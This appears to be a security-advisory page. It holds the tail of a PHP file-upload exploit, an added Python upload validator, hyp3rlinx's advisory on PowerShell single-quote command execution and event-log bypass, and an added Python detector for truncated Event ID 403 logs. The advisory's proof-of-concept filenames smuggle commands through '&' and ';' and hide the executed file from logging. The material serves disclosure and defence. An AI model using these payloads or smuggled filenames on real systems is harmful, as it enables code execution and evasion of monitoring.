application/x-php<br /><br /><?php phpinfo() ?><br /><br />-----------------------------217984066236596965684247013027--<br /><br /><br /><br />Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP addresses with the victim IP address.<br /></code></pre>
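Added example serving both the cmsms-2.2.19 file-upload report earlier on this page and the Lot Reservation upload above; it is not code from either project. Both reports describe the same missing controls: no authentication check before the upload handler runs and no verification that the uploaded file is the image the form field (`img`, a map) is meant to carry. The Python below is a server-side validator that checks the session, allowlists image extensions, requires the content to start with the matching magic bytes, rejects data containing a PHP open tag, and stores under a server-chosen random name so the client's filename never reaches the filesystem. The decision type and function names are mine; sample inputs are constructed.

```python
import os
import re
import secrets
from dataclasses import dataclass

# Allowed map-image types and the magic bytes their content must start with
ALLOWED_IMAGE_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# "<?php" or "<?=" anywhere in the bytes: an image file has no business containing either
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: str = ""   # server-chosen name to write under when accepted


def validate_map_upload(filename: str, content: bytes, session_is_admin: bool) -> UploadDecision:
    """Decide whether a multipart 'img' part may be stored as a map image."""
    # 1. The handler must refuse before it looks at the file at all
    if not session_is_admin:
        return UploadDecision(False, "request is not from an authenticated admin session")
    # 2. Use only the final path component; ignore any client-supplied directory
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_IMAGE_TYPES:
        return UploadDecision(False, f"extension {ext!r} is not an allowed image type")
    # 3. The bytes must actually be that image type, not just be named like one
    if not content.startswith(ALLOWED_IMAGE_TYPES[ext]):
        return UploadDecision(False, "content does not start with the signature for " + ext)
    # 4. Reject image/PHP polyglots outright
    if PHP_OPEN_TAG.search(content):
        return UploadDecision(False, "PHP open tag embedded in image data")
    # 5. Random server-side name: the original name never touches the filesystem
    return UploadDecision(True, "ok", secrets.token_hex(16) + ext)


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32          # constructed minimal PNG prefix
    for name, data, admin in (("phpinfo.php", b"<?php phpinfo() ?>", True),
                              ("map.png", png, False),
                              ("map.png", png, True)):
        print(name, admin, validate_map_upload(name, data, admin))
```

Two things this validator cannot do on its own, and which the advisory's "open directory listing" point makes necessary: the upload directory must be served with PHP execution disabled and with directory listing off, so that even a file that slipped past the checks is neither executed nor discoverable by browsing.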
<pre><code>[+] Credits: John Page (aka hyp3rlinx)<br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec<br /><br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Microsoft Windows PowerShell<br /><br />Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.<br /><br /><br />[Vulnerability Type]<br />PowerShell Single Quote Code Execution / Event Log Bypass<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />In the past I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.<br />This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and a PS event logging failure.<br />On the Windows command line, tab-completing a filename uses double quotes, which can be leveraged to trigger arbitrary code execution.<br />However, if the filename gets wrapped in single quotes it failed; that is, until now.<br /><br />[Single Quote Code Exec Bypass]<br />Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.<br />The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified, in this case DOOM.exe, and the PS event log gets truncated.<br /><br />Take the following three test cases using the Defender API, which takes a specially crafted filename.<br />C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"<br /><br />1) Double quotes OK<br />"Test;saps DOOM;.xml"<br /><br />2) Single quotes FAILS<br />'Test;saps DOOM;.xml'<br /><br />3) Single quotes BYPASS<br />'Test&DOOM;.xml'<br /><br />PowerShell API calls prefixed with the "powershell" cmd are a requirement, and this may affect many built-in PS API or module commands.<br />C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'<br /><br />Malware.exe lives in the Downloads directory; notice how we only need a partial name as part of the .ZIP archive filename we are scanning here,<br />and that it also excludes the .EXE portion in that filename.<br /><br /><br />[PS Event Log Bypass]<br />On Windows, PowerShell event logging can be enabled to alert a SOC on suspicious activity and/or for incident response forensic artifact purposes.<br />However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.<br />For example, when processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.<br /><br />Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)<br />C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5<br /><br />Below, the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed, due to truncation.<br /><br />[PS Log ID 403 Snippet]<br />Engine state is changed from Available to Stopped.
<br /><br />Details: <br /> NewEngineState=Stopped<br /> PreviousEngineState=Available<br /><br /> SequenceNumber=25<br /><br /> HostName=ConsoleHost<br /> HostVersion=5.1.19041.1682<br /> HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0<br /> HostApplication=powershell get-filehash 'Infected<br /> EngineVersion=5.1.19041.1682<br /><br /><br />[Exploit/POC]<br />powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5<br /><br />Run some malware plus bypass logging of true file name:<br />C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5<br />PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.<br /><br />Defender Anti-Malware API:<br />powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'<br /><br />Call ping cmd using double "&":<br />C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5<br /><br />Call a Windows cmd to Logoff the victim:<br />C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'<br /><br />We have options:<br /><br />A) to call commands use double "&" --> 'virus&logoff&test.zip'<br />B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'<br /><br /><br />[References]<br />https://github.com/hyp3rlinx/PSTrojanFile<br />https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt<br />https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt<br /><br /><br />[Network Access]<br />Local<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: circa 2019<br />December 27, 2023 : Public Disclosure<br /><br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br 
/>Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
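Added example, not part of the advisory above: the detection artifact the author describes is visible in the Event ID 403 record itself, where `HostApplication` stops at the ampersand and leaves an unbalanced quote. The Python below parses the "Details" block of such an event (the sample is a constructed reproduction of the snippet quoted in the advisory, using the same field values it shows) and flags two things a SOC rule would key on: a command line whose single or double quotes do not balance, which means it was truncated before logging, and a `&` or `;` inside a quoted argument when the line did survive intact. The function names and message strings are mine.

```python
import re

# Constructed reproduction of the Event ID 403 "Details" block quoted in the advisory
SAMPLE_EVENT_403 = """\
Engine state is changed from Available to Stopped.

Details:
    NewEngineState=Stopped
    PreviousEngineState=Available

    SequenceNumber=25

    HostName=ConsoleHost
    HostVersion=5.1.19041.1682
    HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
    HostApplication=powershell get-filehash 'Infected
    EngineVersion=5.1.19041.1682
"""

TRUNCATED_SINGLE = "unbalanced single quote: command line was truncated before logging"
TRUNCATED_DOUBLE = "unbalanced double quote: command line was truncated before logging"
SEPARATOR_IN_ARG = "'&' or ';' inside a quoted argument: possible command separator in a filename"

DETAIL_LINE = re.compile(r"^\s*([A-Za-z]+)=(.*)$")
# a quoted argument that contains & or ; somewhere inside the quotes
QUOTED_WITH_SEPARATOR = re.compile(r"['\"][^'\"]*[&;][^'\"]*['\"]")


def parse_details(event_text: str) -> dict:
    """Turn the Name=Value lines of a PowerShell engine event into a dict."""
    details = {}
    for line in event_text.splitlines():
        m = DETAIL_LINE.match(line)
        if m:
            details[m.group(1)] = m.group(2).rstrip()
    return details


def host_application_findings(host_application: str) -> list:
    """Heuristics over the logged command line; empty list means nothing odd."""
    findings = []
    if host_application.count("'") % 2:
        findings.append(TRUNCATED_SINGLE)
    if host_application.count('"') % 2:
        findings.append(TRUNCATED_DOUBLE)
    if QUOTED_WITH_SEPARATOR.search(host_application):
        findings.append(SEPARATOR_IN_ARG)
    return findings


def audit_event(event_text: str) -> list:
    """Parse one event and return the findings for its HostApplication field."""
    return host_application_findings(parse_details(event_text).get("HostApplication", ""))


if __name__ == "__main__":
    details = parse_details(SAMPLE_EVENT_403)
    print("HostApplication:", details["HostApplication"])
    for finding in audit_event(SAMPLE_EVENT_403):
        print("   ", finding)
```

A truncated `HostApplication` is only a pointer: the next step is to pair the event with process-creation telemetry for the same host and time window, which records the executable that actually started, since the engine event by itself no longer does.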